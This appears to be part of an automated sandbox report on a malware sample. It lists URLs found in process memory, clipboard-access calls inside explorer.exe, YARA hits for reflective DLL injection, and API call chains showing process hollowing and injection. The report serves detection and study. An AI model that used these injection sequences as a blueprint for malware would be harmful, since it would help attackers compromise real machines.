          Source: 7405.tmp.zx.exe, 00000012.00000003.2072604666.000001EE229C9000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000012.00000002.2075421328.000001EE22A3A000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000012.00000003.2074337833.000001EE22A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
          Source: 7405.tmp.zx.exe, 00000012.00000003.2072604666.000001EE229C9000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000012.00000002.2075688598.000001EE246B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
          Source: 7405.tmp.zx.exe, 00000012.00000003.2074337833.000001EE22A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
          Source: 7405.tmp.zx.exe, 00000012.00000003.2072604666.000001EE229C9000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000012.00000002.2075421328.000001EE22A3A000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000012.00000003.2074337833.000001EE22A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
          Source: 7405.tmp.zx.exe, 00000012.00000003.2072604666.000001EE229C9000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000012.00000002.2075421328.000001EE22A3A000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000012.00000003.2074337833.000001EE22A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
          Source: explorer.exe, 00000004.00000000.1847603303.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000004.00000000.1847603303.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
          Source: explorer.exe, 00000004.00000000.1847603303.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
          Source: explorer.exe, 00000004.00000000.1847603303.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
          Source: explorer.exe, 00000004.00000000.1847603303.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
          Source: explorer.exe, 00000004.00000000.1847603303.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
          Source: explorer.exe, 00000004.00000002.3074143855.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1847603303.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
          Source: explorer.exe, 00000004.00000002.3082183084.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1851675357.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
          Source: explorer.exe, 00000004.00000002.3082183084.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1851675357.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000004.00000000.1847603303.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
          Source: explorer.exe, 00000004.00000000.1847603303.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000004.00000000.1847603303.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000004.00000002.3082183084.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1851675357.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
          Source: explorer.exe, 00000004.00000002.3082183084.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1851675357.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: 7405.tmp.zx.exe, 00000011.00000003.2067655285.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE519D000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059971273.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2060246980.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5199000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059299269.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2068252412.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059491897.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059768742.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2066751113.000001BBE519D000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2066751113.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.17.dr, _socket.pyd.17.dr, _hashlib.pyd.17.dr, _ctypes.pyd.17.dr, _bz2.pyd.17.dr, select.pyd.17.dr, libcrypto-1_1.dll.17.drString found in binary or memory: https://www.digicert.com/CPS0
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.00000000032EE000.00000004.00000800.00020000.00000000.sdmp, 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000003387000.00000004.00000800.00020000.00000000.sdmp, 4A64.tmp.x.exe, 00000009.00000002.2173895800.0000000004189000.00000004.00000800.00020000.00000000.sdmp, 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp, 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000003327000.00000004.00000800.00020000.00000000.sdmp, 4A64.tmp.x.exe, 00000009.00000002.2173895800.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000003291000.00000004.00000800.00020000.00000000.sdmp, 4A64.tmp.x.exe, 00000009.00000002.2173895800.00000000042F6000.00000004.00000800.00020000.00000000.sdmp, 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000003259000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.00000000032EE000.00000004.00000800.00020000.00000000.sdmp, 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000003387000.00000004.00000800.00020000.00000000.sdmp, 4A64.tmp.x.exe, 00000009.00000002.2173895800.0000000004189000.00000004.00000800.00020000.00000000.sdmp, 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp, 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000003327000.00000004.00000800.00020000.00000000.sdmp, 4A64.tmp.x.exe, 00000009.00000002.2173895800.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000003291000.00000004.00000800.00020000.00000000.sdmp, 4A64.tmp.x.exe, 00000009.00000002.2173895800.00000000042F6000.00000004.00000800.00020000.00000000.sdmp, 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000003259000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: explorer.exe, 00000004.00000000.1847603303.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
          Source: explorer.exe, 00000004.00000000.1847603303.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
          Source: explorer.exe, 00000004.00000002.3074143855.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1847603303.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1847603303.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
          Source: explorer.exe, 00000004.00000000.1847603303.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
          Source: explorer.exe, 00000004.00000000.1847603303.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
          Source: explorer.exe, 00000004.00000000.1847603303.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
          Source: explorer.exe, 00000004.00000000.1847603303.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
          Source: explorer.exe, 00000004.00000000.1847603303.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
          Source: explorer.exe, 00000004.00000000.1847603303.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
          Source: explorer.exe, 00000004.00000000.1847603303.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
          Source: explorer.exe, 00000004.00000000.1847603303.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
          Source: explorer.exe, 00000004.00000000.1847603303.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
          Source: explorer.exe, 00000004.00000000.1847603303.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
          Source: explorer.exe, 00000004.00000000.1847603303.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: libcrypto-1_1.dll.17.drString found in binary or memory: https://www.openssl.org/H
          Source: explorer.exe, 00000004.00000000.1847603303.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
          Source: explorer.exe, 00000004.00000000.1847603303.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
          Source: C:\Windows\explorer.exeCode function: 4_2_0E908580 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,4_2_0E908580
          Source: C:\Windows\explorer.exeCode function: 4_2_0E930F90 SetClipboardData,4_2_0E930F90
          Source: C:\Windows\explorer.exeCode function: 4_2_0E908580 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,4_2_0E908580
          Source: C:\Windows\explorer.exeCode function: 4_2_0F4E0F90 SetClipboardData,4_2_0F4E0F90
          Source: C:\Windows\explorer.exeCode function: 4_2_0F4B8580 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,4_2_0F4B8580
          Source: C:\Windows\explorer.exeCode function: 4_2_10D78580 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,4_2_10D78580
          Source: C:\Windows\explorer.exeCode function: 4_2_10DA0F90 SetClipboardData,4_2_10DA0F90
          Source: C:\Windows\explorer.exeCode function: 4_2_0E908390 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,4_2_0E908390

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 4.2.explorer.exe.a020000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 4.2.explorer.exe.c350000.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 4.0.explorer.exe.a020000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 4.2.explorer.exe.cb95950.2.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 4.2.explorer.exe.e8f0000.4.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 2.2.svchost.exe.1301d095000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 2.2.svchost.exe.1301d095000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 4.2.explorer.exe.e8f0000.4.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 4.2.explorer.exe.10d60000.6.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 4.3.explorer.exe.cb95950.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 4.2.explorer.exe.e8a0000.3.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 4.0.explorer.exe.f4a0000.4.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 4.0.explorer.exe.a020000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 4.2.explorer.exe.cb95950.2.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 4.2.explorer.exe.f4a0000.5.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 4.0.explorer.exe.e8a0000.2.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 4.0.explorer.exe.e8a0000.2.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 4.0.explorer.exe.e8f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 4.3.explorer.exe.cb95950.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 4.2.explorer.exe.c350000.1.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 4.0.explorer.exe.e8f0000.3.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 4.0.explorer.exe.c350000.1.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 4.2.explorer.exe.a020000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 4.0.explorer.exe.c350000.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 4.2.explorer.exe.f4a0000.5.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 4.2.explorer.exe.10d60000.6.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 4.0.explorer.exe.f4a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 4.2.explorer.exe.e8a0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 00000002.00000002.3071197547.000001301D095000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 00000004.00000000.1853448227.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 00000004.00000002.3079258886.000000000A020000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 00000004.00000002.3082051736.000000000C350000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 00000004.00000000.1853992940.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 00000004.00000002.3084893712.000000000E8A0000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 00000004.00000000.1850269906.000000000A020000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 00000004.00000000.1853413572.000000000E8A0000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 00000004.00000000.1851595360.000000000C350000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF63A831F8C GetModuleFileNameW,CreateProcessW,CreateFileW,GetFileSize,CloseHandle,VirtualAlloc,CloseHandle,ReadFile,VirtualFree,CloseHandle,CloseHandle,GetThreadContext,VirtualFree,ReadProcessMemory,GetModuleHandleA,GetProcAddress,NtUnmapViewOfSection,VirtualFree,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,WriteProcessMemory,VirtualFree,RtlCompareMemory,ReadProcessMemory,WriteProcessMemory,VirtualFree,WriteProcessMemory,SetThreadContext,VirtualFree,ResumeThread,VirtualFree,VirtualFree,0_2_00007FF63A831F8C
          Source: C:\Windows\explorer.exeCode function: 4_2_0E91F420 InternetReadFile,NtQueryInformationProcess,4_2_0E91F420
          Source: C:\Windows\explorer.exeCode function: 4_2_0E91F420 InternetReadFile,NtQueryInformationProcess,4_2_0E91F420
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8F1370 CreateFileA,GetFileSize,malloc,ReadFile,CloseHandle,CreateProcessA,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,NtQueryInformationProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,free,4_2_0E8F1370
          Source: C:\Windows\explorer.exeCode function: 4_2_0F4CF420 InternetReadFile,NtQueryInformationProcess,4_2_0F4CF420
          Source: C:\Windows\explorer.exeCode function: 4_2_0F4CF420 InternetReadFile,NtQueryInformationProcess,4_2_0F4CF420
          Source: C:\Windows\explorer.exeCode function: 4_2_0F4A1370 CreateFileA,GetFileSize,malloc,ReadFile,CloseHandle,CreateProcessA,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,NtQueryInformationProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,free,4_2_0F4A1370
          Source: C:\Windows\explorer.exeCode function: 4_2_10D61370 CreateFileA,GetFileSize,malloc,ReadFile,CloseHandle,CreateProcessA,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,NtQueryInformationProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,free,4_2_10D61370
          Source: C:\Windows\explorer.exeCode function: 4_2_10D8F420 InternetReadFile,NtQueryInformationProcess,4_2_10D8F420
          Source: C:\Windows\explorer.exeCode function: 4_2_10D8F420 InternetReadFile,NtQueryInformationProcess,4_2_10D8F420
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeCode function: 5_2_00007FF7821C1F8C GetModuleFileNameW,CreateProcessW,CreateFileW,GetFileSize,CloseHandle,VirtualAlloc,CloseHandle,ReadFile,VirtualFree,CloseHandle,CloseHandle,GetThreadContext,VirtualFree,ReadProcessMemory,GetModuleHandleA,GetProcAddress,NtUnmapViewOfSection,VirtualFree,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,WriteProcessMemory,VirtualFree,RtlCompareMemory,ReadProcessMemory,WriteProcessMemory,VirtualFree,WriteProcessMemory,SetThreadContext,VirtualFree,ResumeThread,VirtualFree,VirtualFree,5_2_00007FF7821C1F8C
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF63A8333600_2_00007FF63A833360
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF63A831F8C0_2_00007FF63A831F8C
          Source: C:\Windows\System32\svchost.exeCode function: 2_2_00007FF6EEF233602_2_00007FF6EEF23360
          Source: C:\Windows\System32\svchost.exeCode function: 2_2_00007FF6EEF21F8C2_2_00007FF6EEF21F8C
          Source: C:\Windows\explorer.exeCode function: 4_2_0A04AA004_2_0A04AA00
          Source: C:\Windows\explorer.exeCode function: 4_2_0A04B2544_2_0A04B254
          Source: C:\Windows\explorer.exeCode function: 4_2_0A04C29C4_2_0A04C29C
          Source: C:\Windows\explorer.exeCode function: 4_2_0A047AD44_2_0A047AD4
          Source: C:\Windows\explorer.exeCode function: 4_2_0A03E2E84_2_0A03E2E8
          Source: C:\Windows\explorer.exeCode function: 4_2_0A025B004_2_0A025B00
          Source: C:\Windows\explorer.exeCode function: 4_2_0A0433D04_2_0A0433D0
          Source: C:\Windows\explorer.exeCode function: 4_2_0A033BE04_2_0A033BE0
          Source: C:\Windows\explorer.exeCode function: 4_2_0A0430204_2_0A043020
          Source: C:\Windows\explorer.exeCode function: 4_2_0A04C8324_2_0A04C832
          Source: C:\Windows\explorer.exeCode function: 4_2_0A0480F84_2_0A0480F8
          Source: C:\Windows\explorer.exeCode function: 4_2_0A03E9284_2_0A03E928
          Source: C:\Windows\explorer.exeCode function: 4_2_0A0409BC4_2_0A0409BC
          Source: C:\Windows\explorer.exeCode function: 4_2_0A02660D4_2_0A02660D
          Source: C:\Windows\explorer.exeCode function: 4_2_0A0266174_2_0A026617
          Source: C:\Windows\explorer.exeCode function: 4_2_0A0266214_2_0A026621
          Source: C:\Windows\explorer.exeCode function: 4_2_0A02662B4_2_0A02662B
          Source: C:\Windows\explorer.exeCode function: 4_2_0A0266334_2_0A026633
          Source: C:\Windows\explorer.exeCode function: 4_2_0A02663D4_2_0A02663D
          Source: C:\Windows\explorer.exeCode function: 4_2_0A020E404_2_0A020E40
          Source: C:\Windows\explorer.exeCode function: 4_2_0A0407244_2_0A040724
          Source: C:\Windows\explorer.exeCode function: 4_2_0A048C784_2_0A048C78
          Source: C:\Windows\explorer.exeCode function: 4_2_0A0265804_2_0A026580
          Source: C:\Windows\explorer.exeCode function: 4_2_0C378C784_2_0C378C78
          Source: C:\Windows\explorer.exeCode function: 4_2_0C3565804_2_0C356580
          Source: C:\Windows\explorer.exeCode function: 4_2_0C3566334_2_0C356633
          Source: C:\Windows\explorer.exeCode function: 4_2_0C35663D4_2_0C35663D
          Source: C:\Windows\explorer.exeCode function: 4_2_0C3566214_2_0C356621
          Source: C:\Windows\explorer.exeCode function: 4_2_0C35662B4_2_0C35662B
          Source: C:\Windows\explorer.exeCode function: 4_2_0C3566174_2_0C356617
          Source: C:\Windows\explorer.exeCode function: 4_2_0C35660D4_2_0C35660D
          Source: C:\Windows\explorer.exeCode function: 4_2_0C350E404_2_0C350E40
          Source: C:\Windows\explorer.exeCode function: 4_2_0C3707244_2_0C370724
          Source: C:\Windows\explorer.exeCode function: 4_2_0C37C8324_2_0C37C832
          Source: C:\Windows\explorer.exeCode function: 4_2_0C3730204_2_0C373020
          Source: C:\Windows\explorer.exeCode function: 4_2_0C3780F84_2_0C3780F8
          Source: C:\Windows\explorer.exeCode function: 4_2_0C36E9284_2_0C36E928
          Source: C:\Windows\explorer.exeCode function: 4_2_0C3709BC4_2_0C3709BC
          Source: C:\Windows\explorer.exeCode function: 4_2_0C37AA004_2_0C37AA00
          Source: C:\Windows\explorer.exeCode function: 4_2_0C37B2544_2_0C37B254
          Source: C:\Windows\explorer.exeCode function: 4_2_0C37C29C4_2_0C37C29C
          Source: C:\Windows\explorer.exeCode function: 4_2_0C36E2E84_2_0C36E2E8
          Source: C:\Windows\explorer.exeCode function: 4_2_0C377AD44_2_0C377AD4
          Source: C:\Windows\explorer.exeCode function: 4_2_0C355B004_2_0C355B00
          Source: C:\Windows\explorer.exeCode function: 4_2_0C363BE04_2_0C363BE0
          Source: C:\Windows\explorer.exeCode function: 4_2_0C3733D04_2_0C3733D0
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8A660D4_2_0E8A660D
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8A66174_2_0E8A6617
